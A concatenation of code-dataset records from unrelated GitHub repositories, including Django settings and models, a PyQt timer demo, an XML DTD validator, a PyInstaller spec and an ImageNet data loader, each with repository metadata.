3216fe50f659f9555182cd6e9010327a99bc736c | 50c2bf03543eff23ec2e88f086e33848b50b5c4f | /docs/links.py | 7fb1ce92193eab8aaee889f6876ac192227aa78d | [] | no_license | CiscoTestAutomation/geniefiletransferutilslib | d06967476d78eafe1984a9991a57def25523ade7 | 9c32f121816d7d8f4a1fc4fc1b7c2fe0cf4e9449 | refs/heads/master | 2021-06-03T21:04:24.922438 | 2020-01-20T19:36:53 | 2020-01-20T19:36:53 | 131,624,514 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,016 | py |
internal_links = {'pyats': ('%s://wwwin-pyats.cisco.com', 'pyATS'),
'devnet': ('%s://developer.cisco.com/', 'Cisco DevNet'),
'multiprotocolfileutilities': ('%s://wwwin-pyats.cisco.com/documentation/html/utilities/file_transfer_utilities.html', 'Multiprotocol File Transfer'),
'mailto': ('mailto:asg-genie-support@%s','mailto'),
'communityforum': ('%s://piestack.cisco.com', 'community forum'),
}
external_links = {'pyats': ('%ss://developer.cisco.com/site/pyats/', 'pyATS'),
'devnet': ('%ss://developer.cisco.com/', 'Cisco DevNet'),
'multiprotocolfileutilities': ('%ss://pubhub.devnetcloud.com/media/pyats/docs/utilities/file_transfer_utilities.html', 'Multiprotocol File Transfer'),
'mailto': ('mailto:pyats-support-ext@%s','mailto'),
'communityforum': ('%ss://communities.cisco.com/community/developer/pyats', 'community forum'),
}
| [
"karmoham@cisco.com"
] | karmoham@cisco.com |
cf70dfa5d43d48127e293a0c5dd35957a50a8c06 | 85a60a4ca26f0d38968f7b3746e72e38bae84a18 | /db/base_modle.py | 2c3c5a4d4c78e96bb2e0e4dfb593102700bae422 | [] | no_license | zht-AHTVU/daliyfresh | 3e5bbab9242ede92433da5067ae17dcb1de16f70 | 125579511de9fa6dfb27d2a05b088b20f8205858 | refs/heads/master | 2020-05-25T19:13:52.205338 | 2019-06-02T04:14:43 | 2019-06-02T04:14:43 | 187,945,934 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 415 | py | from django.db import models
class BaseModel(models.Model):
'''模型抽象基类'''
create_time = models.DateTimeField(auto_now=True,verbose_name='创建时间')
up_date_time = models.DateTimeField(auto_now=True,verbose_name='更新时间')
is_delete = models.BooleanField(default=False,verbose_name='删除标记')
class Meta:
abstract = True
#说明是一个抽象模型类
| [
"zhangting@ahou.edu.cn"
] | zhangting@ahou.edu.cn |
ec729ccc29e9f141219a60fe2ab62d58e727803f | fafbbc387a587ba7f8cdb2c6cbca7d7cc1b89f1f | /model/model/settings.py | db5eb87ded543f8aed0caef21fe952f748ca8738 | [] | no_license | anaroja/Django_projects | 3e54652af304b56be9775f1f0287717524a795fa | 1043e69201db5719559599291d7025cf21203f05 | refs/heads/master | 2020-03-09T21:24:09.572508 | 2018-04-13T23:16:37 | 2018-04-13T23:16:37 | 129,008,239 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,110 | py | """
Django settings for model project.
Generated by 'django-admin startproject' using Django 1.11.12.
For more information on this file, see
https://docs.djangoproject.com/en/1.11/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.11/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.11/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'u$)@d7#dh595_5lo!c2uqn(e(hnl^00rw2km^ros@-9e#oel(#'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'apps.mod',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'model.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'model.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.11/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/1.11/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.11/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.11/howto/static-files/
STATIC_URL = '/static/'
| [
"anaroja@amazon.com"
] | anaroja@amazon.com |
db25637737ba7e8275ff2519978809d8f69adc0e | 961cc32229fa31592f85e3ee84626b25f739a507 | /contraladorGastos.py | 2c78598688d0c3fbb14853f3513877831b560c56 | [] | no_license | ElaineVicente/ExerciciosPython | 7025db0aefd21986aea0c4b977c7e89d5bf7f3a8 | ad7ca55335d60a5f3b273113c7b14193c57b6235 | refs/heads/main | 2023-04-18T20:59:47.026863 | 2021-04-26T00:58:18 | 2021-04-26T00:58:18 | 361,571,789 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 421 | py | qt_transacoes = int(input("Digite a quantidade de transações realizadas "))
i = 1
valor_total = 0
media_total = 0
for i in range(qt_transacoes):
valor_transacao = int(input("Digite o valor da transação "))
# alimentos = [i]
valor_total = valor_total + valor_transacao
media_total = valor_total/qt_transacoes
print("Média das transações é: ", media_total)
print("Valor total gasto = ", valor_total)
| [
"elainevicentesouza@gmail.com"
] | elainevicentesouza@gmail.com |
858a53123632c2341a8d43156ec562807a7a9d52 | 53fab060fa262e5d5026e0807d93c75fb81e67b9 | /backup/user_205/ch139_2020_04_01_19_45_57_332549.py | 850ba88067b364259c8a558e3cceaab56293684b | [] | no_license | gabriellaec/desoft-analise-exercicios | b77c6999424c5ce7e44086a12589a0ad43d6adca | 01940ab0897aa6005764fc220b900e4d6161d36b | refs/heads/main | 2023-01-31T17:19:42.050628 | 2020-12-16T05:21:31 | 2020-12-16T05:21:31 | 306,735,108 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 158 | py |
def arcotangente(x,n):
m = 3
i = 3
u = -1
z = x
while (m<n):
z += u*(x**m/i)
u*=-1
m+=2
i+=2
return z | [
"you@example.com"
] | you@example.com |
ff9187fa987aa771ad4a15e06fd8b50ed0b35bbb | bac2fb7ae9a5997cb25774a3e808673acc6fbdc0 | /oconsole.spec | 9b72fbbd4b54558300334932c4948ca68bc24078 | [] | no_license | EarthBugs/ThreadSimulator | dd3998206fc945c9644717b32ee1e99ece0e4025 | df661bf3df6e3cf2e8afd572fc2d79f0fd79db70 | refs/heads/master | 2023-06-04T13:02:26.482950 | 2021-07-03T14:42:29 | 2021-07-03T14:42:29 | 382,634,714 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 900 | spec | # -*- mode: python ; coding: utf-8 -*-
block_cipher = None
a = Analysis(['Main.py'],
pathex=['D:\\Project\\Programming\\PythonProjects\\ThreadSimulator'],
binaries=[],
datas=[],
hiddenimports=['PySide2.QtXml'],
hookspath=[],
runtime_hooks=[],
excludes=[],
win_no_prefer_redirects=False,
win_private_assemblies=False,
cipher=block_cipher,
noarchive=False)
pyz = PYZ(a.pure, a.zipped_data,
cipher=block_cipher)
exe = EXE(pyz,
a.scripts,
a.binaries,
a.zipfiles,
a.datas,
[],
name='oconsole',
debug=False,
bootloader_ignore_signals=False,
strip=False,
upx=True,
upx_exclude=[],
runtime_tmpdir=None,
console=True )
| [
"TknHJQ@qq.com"
] | TknHJQ@qq.com |
6b3e19b3c633b7ce0aa72c220770ab72ab12a828 | 6a0589aa1a5f9071cbcee3f84452c880bf96c12d | /tests/conftest.py | 1b5dcb8b25e52d3f3937e03f61d604e1bf155437 | [
"MIT"
] | permissive | UWPCE-PythonCert/py220_extras | d3203e2fd44ee840d008fac9597a5b0c165e8cc7 | 57336429fb782c4901e7709c0275242e6af4264a | refs/heads/master | 2020-12-01T23:42:58.660565 | 2020-03-11T02:44:18 | 2020-03-11T02:44:18 | 230,816,756 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 236 | py | # -*- coding: utf-8 -*-
"""
Dummy conftest.py for uw_py220_extras.
If you don't know what this is for, just leave it empty.
Read more about conftest.py under:
https://pytest.org/latest/plugins.html
"""
# import pytest
| [
"akmiles@icloud.com"
] | akmiles@icloud.com |
d5273fc4c826924fa2f91bac2446187315ca100f | 310fa7c3307a00b744d84734c8b52fd6f0e4d50c | /tags.py | d4b334b8a106356f90d48116d3f4428aca00ecdd | [
"MIT",
"CC-BY-3.0-US",
"GPL-1.0-or-later",
"BSD-3-Clause",
"OFL-1.1",
"WTFPL"
] | permissive | martinapugliese/martinapugliese.github.io | 116c1976b2613b2709c8a0e701dcd8584319cc21 | fd9fc4a28dfcad4c8f52b15134af7c38c80d2039 | refs/heads/master | 2023-09-04T11:08:04.600248 | 2023-09-03T10:42:52 | 2023-09-03T10:42:52 | 69,119,434 | 4 | 5 | MIT | 2023-08-12T10:09:34 | 2016-09-24T18:11:06 | SCSS | UTF-8 | Python | false | false | 646 | py | # lil' script to fetch all tags on posts (outside of categories ones)
# to see which ones have already been used and to which extent
import os
from collections import Counter
tags = []
filenames = [item for item in os.listdir('_posts') if '.DS_' not in item]
for filename in filenames:
content = open('_posts/' + filename).readlines()
for i in range(len(content)):
if '---' in content[i] and i > 0:
break
else:
line = content[i]
if ' - ' in line and '---' not in line and '#' not in line:
tags.append(line.replace('\n', ''))
c = Counter(tags)
print(c.most_common())
| [
"m.letitbe@gmail.com"
] | m.letitbe@gmail.com |
1c3727643167dbc90fdee63c457b06770635f3fb | b9d720f7fdb5c4ff927c2579a7033b27683b620d | /main_module.py | 31c2aecc9b3200afd7f06318b0da1dc9837ba66f | [] | no_license | koh1979/bottest01 | cc419a4d6ab5ed68669f027339d9d3b71d99f453 | c624019dc8b31371556745fb06d12762579c5ce1 | refs/heads/master | 2022-12-31T02:00:08.239762 | 2020-10-16T16:35:00 | 2020-10-16T16:35:00 | 304,662,264 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 36 | py | def test():
print('module test') | [
"piriya.ng@gmail.com"
] | piriya.ng@gmail.com |
c364f65a620c15ad847eea7738a9b68dceef4c9c | a2c22f562d824e7f866b0904fd474aeb84db893d | /xmltool/dtd.py | 7021a5fd41723579c7ddfc324b24db1040f61882 | [
"MIT"
] | permissive | LeResKP/xmltool | d823428fe2b62fea3d05ea7863e59b8d76aa5206 | 178d54a8d8d2c80a6ce4b96eb5030fa7fea5b62b | refs/heads/develop | 2021-05-17T19:51:49.445632 | 2019-04-03T05:42:26 | 2020-07-21T14:58:32 | 6,756,118 | 6 | 2 | MIT | 2021-03-02T17:30:28 | 2012-11-19T06:52:37 | Python | UTF-8 | Python | false | false | 4,665 | py | from io import StringIO, open
from dogpile.cache.api import NO_VALUE
from lxml import etree
import os
import requests
import six
import tempfile
from . import dtd_parser
from . import cache
class ValidationError(Exception):
pass
class DTD(object):
def __init__(self, url, path=None):
"""
url: the url to get the dtd, it can be http or filesystem resources
path is used in case the dtd use relative filesystem path
"""
self._parsed_dict = None
if isinstance(url, StringIO):
self.url = None
# set _content and validation
# self_content should be str
self._content = url.getvalue()
self.validate()
else:
self.url = url
self.path = path
self._content = None
def _get_dtd_url(self):
if self.url.startswith('http://') or self.url.startswith('https://'):
return self.url
url = self.url
if (self.path and
not self.url.startswith('/') and
not self.url.startswith(self.path)):
url = os.path.join(self.path, self.url)
return url
def _fetch(self):
"""Fetch the dtd content
"""
url = self._get_dtd_url()
if url.startswith('http://') or url.startswith('https://'):
res = requests.get(url, timeout=5)
# Use res.text to have str
self._content = res.text
else:
# TODO: Get encoding from the dtd file (xml tag).
self._content = open(url, 'r').read()
return self._content
@property
def content(self):
"""The dtd content
"""
if self._content:
return self._content
if cache.CACHE_TIMEOUT is None:
return self._fetch()
assert(self.url)
cache_key = 'xmltool.get_dtd_content.%s' % (self._get_dtd_url())
value = cache.region.get(cache_key, cache.CACHE_TIMEOUT)
if value is not NO_VALUE:
return value
content = self._fetch()
self.validate()
cache.region.set(cache_key, content)
return content
def validate(self):
"""Validate the dtd is valid
It raises a ValidationError exception when not valid
It also can raise etree.ParseError if the dtd is unparsable
"""
# Be careful when getting the content we can have a recursive loop
# since we validate the dtd when getting it. But we also want to be
# able to validate a dtd before we fetch the content.
content = self._content if self._content else self.content
f, filename = tempfile.mkstemp()
# Don't know why but the validation doesn't work using a StringIO so we
# write a temporary file
try:
try:
# TODO: Get encoding from the dtd file (xml tag).
os.write(f, content.encode('utf-8'))
finally:
os.close(f)
dtd_obj = etree.DTD(filename)
finally:
os.remove(filename)
if dtd_obj.error_log:
raise ValidationError(dtd_obj.error_log)
# It can raise an exception if something is wrong in the dtd
# For example, etree.DTD doesn't raise exception if a sub element is
# not defined, self.parse does.
self.parse()
def _parse(self):
dtd_dict = dtd_parser.dtd_to_dict_v2(self.content)
self._parsed_dict = dtd_parser._create_classes(dtd_dict)
return self._parsed_dict
def parse(self):
if self._parsed_dict:
return self._parsed_dict
if cache.CACHE_TIMEOUT is None:
return self._parse()
cache_key = 'xmltool.parse.%s' % self.url if self.url else None
if not cache_key:
return self._parse()
value = cache.region.get(cache_key, cache.CACHE_TIMEOUT)
if value is not NO_VALUE:
return value
value = self._parse()
cache.region.set(cache_key, value)
return value
def validate_xml(self, xml_obj):
"""Validate an XML object
:param xml_obj: The XML object to validate
:type xml_obj: etree.Element
:param dtd_str: The dtd to use for the validation
:type dtd_str: str
:return: True. Raise an exception if the XML is not valid
:rtype: bool
"""
# Make sure the dtd is valid
self.validate()
# We should cache the etree.DTD in the object
dtd_obj = etree.DTD(StringIO(self.content))
dtd_obj.assertValid(xml_obj)
return True
| [
"a.matouillot@gmail.com"
] | a.matouillot@gmail.com |
dfeb29a64581f84d9e2ab512576acb3bf5fbf769 | 51aa2894c317f60726fe9a778999eb7851b6be3e | /140_gui/pyqt_pyside/examples/PyQt_PySide_book/002_Processing_of_signals_and_events/+21_Handling signal and slot/21_9_Using class QTimer.py | d3b27afda8a2731f5c7749a149ae85dd10462344 | [] | no_license | pranaymate/Python_Topics | dd7b288ab0f5bbee71d57080179d6481aae17304 | 33d29e0a5bf4cde104f9c7f0693cf9897f3f2101 | refs/heads/master | 2022-04-25T19:04:31.337737 | 2020-04-26T00:36:03 | 2020-04-26T00:36:03 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,608 | py | # -*- coding: utf-8 -*-
from PyQt4 import QtCore, QtGui
import time
class MyWindow(QtGui.QWidget):
def __init__(self, parent=None):
QtGui.QWidget.__init__(self, parent)
self.setWindowTitle("Использование класса QTimer")
self.resize(200, 100)
self.label = QtGui.QLabel("")
self.label.setAlignment(QtCore.Qt.AlignCenter)
self.button1 = QtGui.QPushButton("Запустить")
self.button2 = QtGui.QPushButton("Остановить")
self.button2.setEnabled(False)
vbox = QtGui.QVBoxLayout()
vbox.addWidget(self.label)
vbox.addWidget(self.button1)
vbox.addWidget(self.button2)
self.setLayout(vbox)
self.connect(self.button1, QtCore.SIGNAL("clicked()"),
self.on_clicked_button1)
self.connect(self.button2, QtCore.SIGNAL("clicked()"),
self.on_clicked_button2)
self.timer = QtCore.QTimer()
self.connect(self.timer, QtCore.SIGNAL("timeout()"),
self.on_timeout);
def on_clicked_button1(self):
self.timer.start(1000) # 1 секунда
self.button1.setEnabled(False)
self.button2.setEnabled(True)
def on_clicked_button2(self):
self.timer.stop()
self.button1.setEnabled(True)
self.button2.setEnabled(False)
def on_timeout(self):
self.label.setText(time.strftime("%H:%M:%S"))
if __name__ == "__main__":
import sys
app = QtGui.QApplication(sys.argv)
window = MyWindow()
window.show()
sys.exit(app.exec_()) | [
"sergejyurskyj@yahoo.com"
] | sergejyurskyj@yahoo.com |
516ca97ed4de2823f6105dd13e51cbf631df8882 | ef9d010451492f896e611130630865ad82da4351 | /src/dataset/imagenet.py | 718ebfaf9c6156ab8c9777b9e1668593b762f18b | [
"BSD-2-Clause"
] | permissive | goan15910/ConvDet | 72125bb7b35734237ef7480785ce1d205a684a31 | 6404622cc9d0c8e8b756260c4979b6842b2d0cb0 | refs/heads/master | 2021-01-11T14:19:21.335131 | 2017-05-16T07:40:48 | 2017-05-16T07:40:48 | 81,350,946 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,304 | py |
"""Image data base class for ILSVRC 2013"""
import cv2
import os
import numpy as np
import xml.etree.ElementTree as ET
from dataset.imdb import imdb
class imagenet(imdb):
def __init__(self, image_set, data_path, mc):
imdb.__init__(self, 'ILSVRC2013_'+image_set, mc)
self._image_set = image_set
self._data_path = data_path
self._classes = self.mc.CLASS_NAMES
#self._class_to_idx = dict(zip(self.classes, range(self.num_classes)))
# a list of string indices of images in the directory
self._image_idx = self._load_image_set_idx()
# a list of class labels
self.labels = self._load_imagenet_labels()
## batch reader ##
self._perm_idx = None
self._cur_idx = 0
self._shuffle_image_idx()
def _load_image_set_idx(self):
image_set_file = os.path.join(self._data_path, 'ImageSets',
self._image_set+'.txt')
assert os.path.exists(image_set_file), \
'File does not exist: {}'.format(image_set_file)
with open(image_set_file) as f:
image_idx = [x.strip() for x in f.readlines()]
return image_idx
def _image_path_at(self, idx):
image_path = os.path.join(self._data_path, 'Data', self._image_set, idx+'.JPEG')
assert os.path.exists(image_path), \
'Image does not exist: {}'.format(image_path)
return image_path
def _load_imagenet_labels(self):
labels_file = os.path.join(self._data_path, 'ILSVRC2013_devkit', \
'data', 'ILSVRC2013_clsloc_validation_ground_truth.txt')
assert os.path.exists(labels_file), \
'File does not exist: {}'.format(labels_file)
with open(labels_file, 'r') as f:
lines = f.readlines()
labels = [ int(line.strip()) for line in lines ]
return labels
def read_cls_batch(self, shuffle=True):
"""Read a batch of images and labels
Args:
shuffle: whether or not to shuffle the dataset
Returns:
images: list of arrays [h, w, c]
labels: list of class indexes
scales: list of resize scale factor
"""
mc = self.mc
if shuffle:
if self._cur_idx + mc.BATCH_SIZE >= len(self._image_idx):
self._shuffle_image_idx()
batch_idx = self._perm_idx[self._cur_idx:self._cur_idx+mc.BATCH_SIZE]
self._cur_idx += mc.BATCH_SIZE
else:
if self._cur_idx + mc.BATCH_SIZE >= len(self._image_idx):
batch_idx = self._image_idx[self._cur_idx:] \
+ self._image_idx[:self._cur_idx + mc.BATCH_SIZE-len(self._image_idx)]
self._cur_idx += mc.BATCH_SIZE - len(self._image_idx)
else:
batch_idx = self._image_idx[self._cur_idx:self._cur_idx+mc.BATCH_SIZE]
self._cur_idx += mc.BATCH_SIZE
images, labels, scales = [], [], []
for i in batch_idx:
im = cv2.imread(self._image_path_at(i))
if mc.SUB_BGR_MEANS:
im = im.astype(np.float32, copy=False)
im -= mc.BGR_MEANS
orig_h, orig_w, _ = [float(v) for v in im.shape]
im = cv2.resize(im, (mc.IMAGE_WIDTH, mc.IMAGE_HEIGHT))
x_scale = mc.IMAGE_WIDTH/orig_w
y_scale = mc.IMAGE_HEIGHT/orig_h
images.append(im)
label_idx = int(i.split('_')[-1])-1
labels.append(self.labels[label_idx]-1)
scales.append((x_scale, y_scale))
return images, labels, scales
| [
"goan15910@cml19.csie.ntu.edu.tw"
] | goan15910@cml19.csie.ntu.edu.tw |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.